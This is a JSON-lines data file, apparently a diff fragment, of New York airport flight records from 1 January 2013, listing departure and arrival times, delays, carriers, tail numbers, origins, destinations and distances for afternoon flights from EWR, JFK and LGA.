+{"year":2013,"month":1,"day":1,"dep_time":1327,"sched_dep_time":1329,"dep_delay":-2,"arr_time":1624,"sched_arr_time":1629,"arr_delay":-5,"carrier":"UA","flight":906,"tailnum":"N847UA","origin":"EWR","dest":"FLL","air_time":157,"distance":1065,"hour":13,"minute":29,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1330,"sched_dep_time":1321,"dep_delay":9,"arr_time":1613,"sched_arr_time":1536,"arr_delay":37,"carrier":"EV","flight":3849,"tailnum":"N14558","origin":"EWR","dest":"IND","air_time":149,"distance":645,"hour":13,"minute":21,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1333,"sched_dep_time":1335,"dep_delay":-2,"arr_time":1608,"sched_arr_time":1608,"arr_delay":0,"carrier":"B6","flight":615,"tailnum":"N306JB","origin":"JFK","dest":"JAX","air_time":134,"distance":828,"hour":13,"minute":35,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1336,"sched_dep_time":1340,"dep_delay":-4,"arr_time":1508,"sched_arr_time":1500,"arr_delay":8,"carrier":"EV","flight":4665,"tailnum":"N13988","origin":"EWR","dest":"PIT","air_time":69,"distance":319,"hour":13,"minute":40,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1337,"sched_dep_time":1220,"dep_delay":77,"arr_time":1649,"sched_arr_time":1531,"arr_delay":78,"carrier":"B6","flight":673,"tailnum":"N636JB","origin":"JFK","dest":"LAX","air_time":352,"distance":2475,"hour":12,"minute":20,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1339,"sched_dep_time":1345,"dep_delay":-6,"arr_time":1642,"sched_arr_time":1705,"arr_delay":-23,"carrier":"AA","flight":1073,"tailnum":"N3EMAA","origin":"LGA","dest":"MIA","air_time":161,"distance":1096,"hour":13,"minute":45,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1339,"sched_dep_time":1335,"dep_delay":4,"arr_time":1654,"sched_arr_time":1631,"arr_delay":23,"carrier":"B6","flight":431,"tailnum":"N510JB","origin":"LGA","dest":"SRQ","air_time":170,"distance":1047,"hour":13,"minute":35,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1341,"sched_dep_time":1345,"dep_delay":-4,"arr_time":1709,"sched_arr_time":1705,"arr_delay":4,"carrier":"AA","flight":117,"tailnum":"N339AA","origin":"JFK","dest":"LAX","air_time":362,"distance":2475,"hour":13,"minute":45,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1342,"sched_dep_time":1320,"dep_delay":22,"arr_time":1617,"sched_arr_time":1504,"arr_delay":73,"carrier":"EV","flight":3832,"tailnum":"N13969","origin":"EWR","dest":"STL","air_time":194,"distance":872,"hour":13,"minute":20,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1343,"sched_dep_time":1330,"dep_delay":13,"arr_time":1658,"sched_arr_time":1640,"arr_delay":18,"carrier":"AA","flight":753,"tailnum":"N3CFAA","origin":"LGA","dest":"DFW","air_time":235,"distance":1389,"hour":13,"minute":30,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1344,"sched_dep_time":1344,"dep_delay":0,"arr_time":2005,"sched_arr_time":1944,"arr_delay":21,"carrier":"UA","flight":15,"tailnum":"N76065","origin":"EWR","dest":"HNL","air_time":656,"distance":4963,"hour":13,"minute":44,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1346,"sched_dep_time":1330,"dep_delay":16,"arr_time":1736,"sched_arr_time":1710,"arr_delay":26,"carrier":"WN","flight":2335,"tailnum":"N900WN","origin":"EWR","dest":"PHX","air_time":334,"distance":2133,"hour":13,"minute":30,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1350,"sched_dep_time":1329,"dep_delay":21,"arr_time":1504,"sched_arr_time":1453,"arr_delay":11,"carrier":"EV","flight":4254,"tailnum":"N14542","origin":"EWR","dest":"BUF","air_time":57,"distance":282,"hour":13,"minute":29,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1350,"sched_dep_time":1355,"dep_delay":-5,"arr_time":1456,"sched_arr_time":1510,"arr_delay":-14,"carrier":"B6","flight":602,"tailnum":"N216JB","origin":"JFK","dest":"PWM","air_time":49,"distance":273,"hour":13,"minute":55,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1351,"sched_dep_time":1355,"dep_delay":-4,"arr_time":1446,"sched_arr_time":1459,"arr_delay":-13,"carrier":"EV","flight":4434,"tailnum":"N13566","origin":"EWR","dest":"MHT","air_time":37,"distance":209,"hour":13,"minute":55,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1353,"sched_dep_time":1357,"dep_delay":-4,"arr_time":1549,"sched_arr_time":1525,"arr_delay":24,"carrier":"EV","flight":4171,"tailnum":"N14105","origin":"EWR","dest":"MSN","air_time":152,"distance":799,"hour":13,"minute":57,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1354,"sched_dep_time":1356,"dep_delay":-2,"arr_time":1556,"sched_arr_time":1600,"arr_delay":-4,"carrier":"EV","flight":4370,"tailnum":"N23139","origin":"EWR","dest":"CHS","air_time":102,"distance":628,"hour":13,"minute":56,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1354,"sched_dep_time":1359,"dep_delay":-5,"arr_time":1452,"sched_arr_time":1514,"arr_delay":-22,"carrier":"DL","flight":2068,"tailnum":"N344NB","origin":"JFK","dest":"BOS","air_time":37,"distance":187,"hour":13,"minute":59,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1355,"sched_dep_time":1315,"dep_delay":40,"arr_time":1538,"sched_arr_time":1452,"arr_delay":46,"carrier":"EV","flight":4552,"tailnum":"N13958","origin":"EWR","dest":"GSO","air_time":86,"distance":445,"hour":13,"minute":15,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1355,"sched_dep_time":1356,"dep_delay":-1,"arr_time":1646,"sched_arr_time":1650,"arr_delay":-4,"carrier":"B6","flight":1783,"tailnum":"N709JB","origin":"JFK","dest":"MCO","air_time":144,"distance":944,"hour":13,"minute":56,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1355,"sched_dep_time":1350,"dep_delay":5,"arr_time":1537,"sched_arr_time":1515,"arr_delay":22,"carrier":"WN","flight":2162,"tailnum":"N7704B","origin":"LGA","dest":"MDW","air_time":141,"distance":725,"hour":13,"minute":50,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1356,"sched_dep_time":1350,"dep_delay":6,"arr_time":1612,"sched_arr_time":1545,"arr_delay":27,"carrier":"MQ","flight":4577,"tailnum":"N513MQ","origin":"LGA","dest":"CLT","air_time":98,"distance":544,"hour":13,"minute":50,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1356,"sched_dep_time":1259,"dep_delay":57,"arr_time":1538,"sched_arr_time":1438,"arr_delay":60,"carrier":"UA","flight":32,"tailnum":"N17128","origin":"EWR","dest":"ORD","air_time":135,"distance":719,"hour":12,"minute":59,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1356,"sched_dep_time":1354,"dep_delay":2,"arr_time":1537,"sched_arr_time":1526,"arr_delay":11,"carrier":"UA","flight":617,"tailnum":"N840UA","origin":"LGA","dest":"ORD","air_time":146,"distance":733,"hour":13,"minute":54,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1356,"sched_dep_time":1350,"dep_delay":6,"arr_time":1659,"sched_arr_time":1640,"arr_delay":19,"carrier":"UA","flight":1258,"tailnum":"N26906","origin":"EWR","dest":"IAH","air_time":218,"distance":1400,"hour":13,"minute":50,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1358,"sched_dep_time":1350,"dep_delay":8,"arr_time":1742,"sched_arr_time":1715,"arr_delay":27,"carrier":"US","flight":688,"tailnum":"N654AW","origin":"EWR","dest":"PHX","air_time":318,"distance":2133,"hour":13,"minute":50,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1400,"sched_dep_time":1250,"dep_delay":70,"arr_time":1645,"sched_arr_time":1502,"arr_delay":103,"carrier":"EV","flight":4869,"tailnum":"N748EV","origin":"LGA","dest":"MEM","air_time":178,"distance":963,"hour":12,"minute":50,"time_hour":"2013-01-01 12:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1400,"sched_dep_time":1400,"dep_delay":0,"arr_time":1634,"sched_arr_time":1636,"arr_delay":-2,"carrier":"DL","flight":2247,"tailnum":"N6704Z","origin":"LGA","dest":"ATL","air_time":130,"distance":762,"hour":14,"minute":0,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1402,"sched_dep_time":1323,"dep_delay":39,"arr_time":1650,"sched_arr_time":1526,"arr_delay":84,"carrier":"EV","flight":4516,"tailnum":"N13123","origin":"EWR","dest":"MEM","air_time":183,"distance":946,"hour":13,"minute":23,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1408,"sched_dep_time":1411,"dep_delay":-3,"arr_time":1646,"sched_arr_time":1640,"arr_delay":6,"carrier":"FL","flight":349,"tailnum":"N895AT","origin":"LGA","dest":"ATL","air_time":133,"distance":762,"hour":14,"minute":11,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1411,"sched_dep_time":1315,"dep_delay":56,"arr_time":1717,"sched_arr_time":1611,"arr_delay":66,"carrier":"B6","flight":505,"tailnum":"N516JB","origin":"EWR","dest":"FLL","air_time":154,"distance":1065,"hour":13,"minute":15,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1416,"sched_dep_time":1411,"dep_delay":5,"arr_time":1603,"sched_arr_time":1549,"arr_delay":14,"carrier":"UA","flight":683,"tailnum":"N456UA","origin":"EWR","dest":"ORD","air_time":136,"distance":719,"hour":14,"minute":11,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1418,"sched_dep_time":1419,"dep_delay":-1,"arr_time":1726,"sched_arr_time":1732,"arr_delay":-6,"carrier":"UA","flight":16,"tailnum":"N37464","origin":"EWR","dest":"SEA","air_time":348,"distance":2402,"hour":14,"minute":19,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1419,"sched_dep_time":1420,"dep_delay":-1,"arr_time":1557,"sched_arr_time":1550,"arr_delay":7,"carrier":"MQ","flight":3728,"tailnum":"N500MQ","origin":"EWR","dest":"ORD","air_time":136,"distance":719,"hour":14,"minute":20,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1421,"sched_dep_time":1422,"dep_delay":-1,"arr_time":1517,"sched_arr_time":1535,"arr_delay":-18,"carrier":"B6","flight":1010,"tailnum":"N274JB","origin":"JFK","dest":"BOS","air_time":38,"distance":187,"hour":14,"minute":22,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1421,"sched_dep_time":1355,"dep_delay":26,"arr_time":1735,"sched_arr_time":1709,"arr_delay":26,"carrier":"B6","flight":83,"tailnum":"N503JB","origin":"JFK","dest":"SEA","air_time":349,"distance":2422,"hour":13,"minute":55,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1421,"sched_dep_time":1430,"dep_delay":-9,"arr_time":1724,"sched_arr_time":1752,"arr_delay":-28,"carrier":"DL","flight":1531,"tailnum":"N327NW","origin":"LGA","dest":"RSW","air_time":160,"distance":1080,"hour":14,"minute":30,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1422,"sched_dep_time":1410,"dep_delay":12,"arr_time":1613,"sched_arr_time":1555,"arr_delay":18,"carrier":"MQ","flight":4491,"tailnum":"N737MQ","origin":"LGA","dest":"CLE","air_time":93,"distance":419,"hour":14,"minute":10,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1422,"sched_dep_time":1425,"dep_delay":-3,"arr_time":1748,"sched_arr_time":1759,"arr_delay":-11,"carrier":"UA","flight":257,"tailnum":"N502UA","origin":"JFK","dest":"SFO","air_time":362,"distance":2586,"hour":14,"minute":25,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1423,"sched_dep_time":1430,"dep_delay":-7,"arr_time":1535,"sched_arr_time":1550,"arr_delay":-15,"carrier":"EV","flight":5710,"tailnum":"N835AS","origin":"LGA","dest":"IAD","air_time":53,"distance":229,"hour":14,"minute":30,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1424,"sched_dep_time":1349,"dep_delay":35,"arr_time":1701,"sched_arr_time":1556,"arr_delay":65,"carrier":"EV","flight":4687,"tailnum":"N15574","origin":"EWR","dest":"CVG","air_time":129,"distance":569,"hour":13,"minute":49,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1424,"sched_dep_time":1420,"dep_delay":4,"arr_time":1659,"sched_arr_time":1644,"arr_delay":15,"carrier":"EV","flight":4935,"tailnum":"N678CA","origin":"EWR","dest":"ATL","air_time":132,"distance":746,"hour":14,"minute":20,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1428,"sched_dep_time":1329,"dep_delay":59,"arr_time":1803,"sched_arr_time":1640,"arr_delay":83,"carrier":"B6","flight":355,"tailnum":"N635JB","origin":"JFK","dest":"BUR","air_time":371,"distance":2465,"hour":13,"minute":29,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1430,"sched_dep_time":1359,"dep_delay":31,"arr_time":1718,"sched_arr_time":1652,"arr_delay":26,"carrier":"UA","flight":278,"tailnum":"N563UA","origin":"EWR","dest":"PBI","air_time":149,"distance":1023,"hour":13,"minute":59,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1430,"sched_dep_time":1430,"dep_delay":0,"arr_time":1735,"sched_arr_time":1744,"arr_delay":-9,"carrier":"UA","flight":997,"tailnum":"N452UA","origin":"LGA","dest":"IAH","air_time":227,"distance":1416,"hour":14,"minute":30,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1431,"sched_dep_time":1429,"dep_delay":2,"arr_time":1727,"sched_arr_time":1722,"arr_delay":5,"carrier":"B6","flight":1161,"tailnum":"N562JB","origin":"LGA","dest":"PBI","air_time":151,"distance":1035,"hour":14,"minute":29,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1431,"sched_dep_time":1440,"dep_delay":-9,"arr_time":1627,"sched_arr_time":1616,"arr_delay":11,"carrier":"UA","flight":601,"tailnum":"N849UA","origin":"EWR","dest":"CLE","air_time":91,"distance":404,"hour":14,"minute":40,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1433,"sched_dep_time":1435,"dep_delay":-2,"arr_time":1636,"sched_arr_time":1644,"arr_delay":-8,"carrier":"DL","flight":1819,"tailnum":"N327NB","origin":"LGA","dest":"MSP","air_time":163,"distance":1020,"hour":14,"minute":35,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1436,"sched_dep_time":1435,"dep_delay":1,"arr_time":1840,"sched_arr_time":1820,"arr_delay":20,"carrier":"DL","flight":1322,"tailnum":"N722TW","origin":"JFK","dest":"SFO","air_time":375,"distance":2586,"hour":14,"minute":35,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1439,"sched_dep_time":1445,"dep_delay":-6,"arr_time":1558,"sched_arr_time":1613,"arr_delay":-15,"carrier":"DL","flight":1972,"tailnum":"N319NB","origin":"JFK","dest":"DCA","air_time":56,"distance":213,"hour":14,"minute":45,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1440,"sched_dep_time":1440,"dep_delay":0,"arr_time":1658,"sched_arr_time":1643,"arr_delay":15,"carrier":"DL","flight":1231,"tailnum":"N926DL","origin":"LGA","dest":"DTW","air_time":94,"distance":502,"hour":14,"minute":40,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1442,"sched_dep_time":1450,"dep_delay":-8,"arr_time":1728,"sched_arr_time":1755,"arr_delay":-27,"carrier":"AA","flight":1813,"tailnum":"N5FMAA","origin":"JFK","dest":"MCO","air_time":141,"distance":944,"hour":14,"minute":50,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1443,"sched_dep_time":1444,"dep_delay":-1,"arr_time":1600,"sched_arr_time":1602,"arr_delay":-2,"carrier":"EV","flight":4292,"tailnum":"N13908","origin":"EWR","dest":"IAD","air_time":51,"distance":212,"hour":14,"minute":44,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1445,"sched_dep_time":1455,"dep_delay":-10,"arr_time":1635,"sched_arr_time":1645,"arr_delay":-10,"carrier":"AA","flight":337,"tailnum":"N4UCAA","origin":"LGA","dest":"ORD","air_time":147,"distance":733,"hour":14,"minute":55,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1445,"sched_dep_time":1445,"dep_delay":0,"arr_time":1729,"sched_arr_time":1710,"arr_delay":19,"carrier":"MQ","flight":4669,"tailnum":"N532MQ","origin":"LGA","dest":"ATL","air_time":129,"distance":762,"hour":14,"minute":45,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1446,"sched_dep_time":1455,"dep_delay":-9,"arr_time":1803,"sched_arr_time":1825,"arr_delay":-22,"carrier":"AA","flight":1769,"tailnum":"N5EWAA","origin":"JFK","dest":"MIA","air_time":161,"distance":1089,"hour":14,"minute":55,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1448,"sched_dep_time":1445,"dep_delay":3,"arr_time":1651,"sched_arr_time":1647,"arr_delay":4,"carrier":"US","flight":1445,"tailnum":"N560UW","origin":"LGA","dest":"CLT","air_time":96,"distance":544,"hour":14,"minute":45,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1449,"sched_dep_time":1450,"dep_delay":-1,"arr_time":1651,"sched_arr_time":1640,"arr_delay":11,"carrier":"MQ","flight":4403,"tailnum":"N853MQ","origin":"JFK","dest":"RDU","air_time":78,"distance":427,"hour":14,"minute":50,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1451,"sched_dep_time":1500,"dep_delay":-9,"arr_time":1634,"sched_arr_time":1636,"arr_delay":-2,"carrier":"9E","flight":4105,"tailnum":"N8444F","origin":"JFK","dest":"IAD","air_time":57,"distance":228,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1452,"sched_dep_time":1455,"dep_delay":-3,"arr_time":1637,"sched_arr_time":1639,"arr_delay":-2,"carrier":"9E","flight":3295,"tailnum":"N920XJ","origin":"JFK","dest":"BUF","air_time":68,"distance":301,"hour":14,"minute":55,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1452,"sched_dep_time":1457,"dep_delay":-5,"arr_time":1753,"sched_arr_time":1811,"arr_delay":-18,"carrier":"B6","flight":61,"tailnum":"N292JB","origin":"JFK","dest":"FLL","air_time":162,"distance":1069,"hour":14,"minute":57,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1453,"sched_dep_time":1450,"dep_delay":3,"arr_time":1707,"sched_arr_time":1645,"arr_delay":22,"carrier":"MQ","flight":4172,"tailnum":"N610MQ","origin":"JFK","dest":"CLE","air_time":99,"distance":425,"hour":14,"minute":50,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1453,"sched_dep_time":1500,"dep_delay":-7,"arr_time":1601,"sched_arr_time":1620,"arr_delay":-19,"carrier":"US","flight":2179,"tailnum":"N951UW","origin":"LGA","dest":"DCA","air_time":51,"distance":214,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1454,"sched_dep_time":1458,"dep_delay":-4,"arr_time":1554,"sched_arr_time":1615,"arr_delay":-21,"carrier":"EV","flight":4390,"tailnum":"N11544","origin":"EWR","dest":"PWM","air_time":47,"distance":284,"hour":14,"minute":58,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1454,"sched_dep_time":1500,"dep_delay":-6,"arr_time":1635,"sched_arr_time":1636,"arr_delay":-1,"carrier":"9E","flight":3843,"tailnum":"N8409N","origin":"JFK","dest":"SYR","air_time":57,"distance":209,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1454,"sched_dep_time":1500,"dep_delay":-6,"arr_time":1815,"sched_arr_time":1837,"arr_delay":-22,"carrier":"DL","flight":1467,"tailnum":"N702TW","origin":"JFK","dest":"LAX","air_time":340,"distance":2475,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1455,"sched_dep_time":1457,"dep_delay":-2,"arr_time":1731,"sched_arr_time":1730,"arr_delay":1,"carrier":"B6","flight":119,"tailnum":"N279JB","origin":"JFK","dest":"MSY","air_time":192,"distance":1182,"hour":14,"minute":57,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1455,"sched_dep_time":1459,"dep_delay":-4,"arr_time":1655,"sched_arr_time":1645,"arr_delay":10,"carrier":"B6","flight":1053,"tailnum":"N203JB","origin":"JFK","dest":"PIT","air_time":87,"distance":340,"hour":14,"minute":59,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1455,"sched_dep_time":1500,"dep_delay":-5,"arr_time":1753,"sched_arr_time":1810,"arr_delay":-17,"carrier":"DL","flight":1997,"tailnum":"N997DL","origin":"LGA","dest":"PBI","air_time":152,"distance":1035,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1456,"sched_dep_time":1500,"dep_delay":-4,"arr_time":1649,"sched_arr_time":1632,"arr_delay":17,"carrier":"UA","flight":685,"tailnum":"N802UA","origin":"LGA","dest":"ORD","air_time":140,"distance":733,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1456,"sched_dep_time":1455,"dep_delay":1,"arr_time":1830,"sched_arr_time":1813,"arr_delay":17,"carrier":"UA","flight":1134,"tailnum":"N24212","origin":"EWR","dest":"AUS","air_time":252,"distance":1504,"hour":14,"minute":55,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1457,"sched_dep_time":1500,"dep_delay":-3,"arr_time":1758,"sched_arr_time":1815,"arr_delay":-17,"carrier":"UA","flight":379,"tailnum":"N401UA","origin":"EWR","dest":"RSW","air_time":166,"distance":1068,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1457,"sched_dep_time":1500,"dep_delay":-3,"arr_time":1652,"sched_arr_time":1656,"arr_delay":-4,"carrier":"US","flight":720,"tailnum":"N539UW","origin":"EWR","dest":"CLT","air_time":97,"distance":529,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1458,"sched_dep_time":1500,"dep_delay":-2,"arr_time":1658,"sched_arr_time":1655,"arr_delay":3,"carrier":"MQ","flight":4429,"tailnum":"N736MQ","origin":"LGA","dest":"CMH","air_time":94,"distance":479,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1459,"sched_dep_time":1501,"dep_delay":-2,"arr_time":1651,"sched_arr_time":1651,"arr_delay":0,"carrier":"EV","flight":5675,"tailnum":"N15572","origin":"EWR","dest":"CMH","air_time":96,"distance":463,"hour":15,"minute":1,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1459,"sched_dep_time":1454,"dep_delay":5,"arr_time":1750,"sched_arr_time":1751,"arr_delay":-1,"carrier":"UA","flight":1105,"tailnum":"N75435","origin":"EWR","dest":"TPA","air_time":152,"distance":997,"hour":14,"minute":54,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1500,"sched_dep_time":1459,"dep_delay":1,"arr_time":1809,"sched_arr_time":1806,"arr_delay":3,"carrier":"B6","flight":377,"tailnum":"N633JB","origin":"LGA","dest":"FLL","air_time":167,"distance":1076,"hour":14,"minute":59,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1502,"sched_dep_time":1500,"dep_delay":2,"arr_time":1802,"sched_arr_time":1806,"arr_delay":-4,"carrier":"UA","flight":456,"tailnum":"N406UA","origin":"EWR","dest":"FLL","air_time":156,"distance":1065,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1505,"sched_dep_time":1310,"dep_delay":115,"arr_time":1638,"sched_arr_time":1431,"arr_delay":127,"carrier":"EV","flight":4497,"tailnum":"N17984","origin":"EWR","dest":"RIC","air_time":63,"distance":277,"hour":13,"minute":10,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1505,"sched_dep_time":1510,"dep_delay":-5,"arr_time":1654,"sched_arr_time":1655,"arr_delay":-1,"carrier":"MQ","flight":4447,"tailnum":"N734MQ","origin":"LGA","dest":"RDU","air_time":82,"distance":431,"hour":15,"minute":10,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1506,"sched_dep_time":1505,"dep_delay":1,"arr_time":1838,"sched_arr_time":1820,"arr_delay":18,"carrier":"AA","flight":759,"tailnum":"N3DUAA","origin":"LGA","dest":"DFW","air_time":248,"distance":1389,"hour":15,"minute":5,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1506,"sched_dep_time":1512,"dep_delay":-6,"arr_time":1723,"sched_arr_time":1741,"arr_delay":-18,"carrier":"UA","flight":407,"tailnum":"N513UA","origin":"LGA","dest":"DEN","air_time":237,"distance":1620,"hour":15,"minute":12,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1507,"sched_dep_time":1515,"dep_delay":-8,"arr_time":1651,"sched_arr_time":1656,"arr_delay":-5,"carrier":"9E","flight":3792,"tailnum":"N8631E","origin":"JFK","dest":"ROC","air_time":66,"distance":264,"hour":15,"minute":15,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1507,"sched_dep_time":1510,"dep_delay":-3,"arr_time":1748,"sched_arr_time":1745,"arr_delay":3,"carrier":"MQ","flight":4309,"tailnum":"N803MQ","origin":"JFK","dest":"IND","air_time":130,"distance":665,"hour":15,"minute":10,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1508,"sched_dep_time":1450,"dep_delay":18,"arr_time":1813,"sched_arr_time":1747,"arr_delay":26,"carrier":"UA","flight":1687,"tailnum":"N76529","origin":"EWR","dest":"MCO","air_time":146,"distance":937,"hour":14,"minute":50,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1510,"sched_dep_time":1517,"dep_delay":-7,"arr_time":1811,"sched_arr_time":1811,"arr_delay":0,"carrier":"B6","flight":537,"tailnum":"N563JB","origin":"EWR","dest":"TPA","air_time":156,"distance":997,"hour":15,"minute":17,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1511,"sched_dep_time":1500,"dep_delay":11,"arr_time":1753,"sched_arr_time":1742,"arr_delay":11,"carrier":"DL","flight":2347,"tailnum":"N678DL","origin":"LGA","dest":"ATL","air_time":135,"distance":762,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1511,"sched_dep_time":1515,"dep_delay":-4,"arr_time":1657,"sched_arr_time":1700,"arr_delay":-3,"carrier":"DL","flight":1456,"tailnum":"N318NB","origin":"LGA","dest":"BUF","air_time":60,"distance":292,"hour":15,"minute":15,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1512,"sched_dep_time":1518,"dep_delay":-6,"arr_time":1805,"sched_arr_time":1823,"arr_delay":-18,"carrier":"B6","flight":153,"tailnum":"N645JB","origin":"JFK","dest":"MCO","air_time":142,"distance":944,"hour":15,"minute":18,"time_hour":"2013-01-01 15:00:00"} 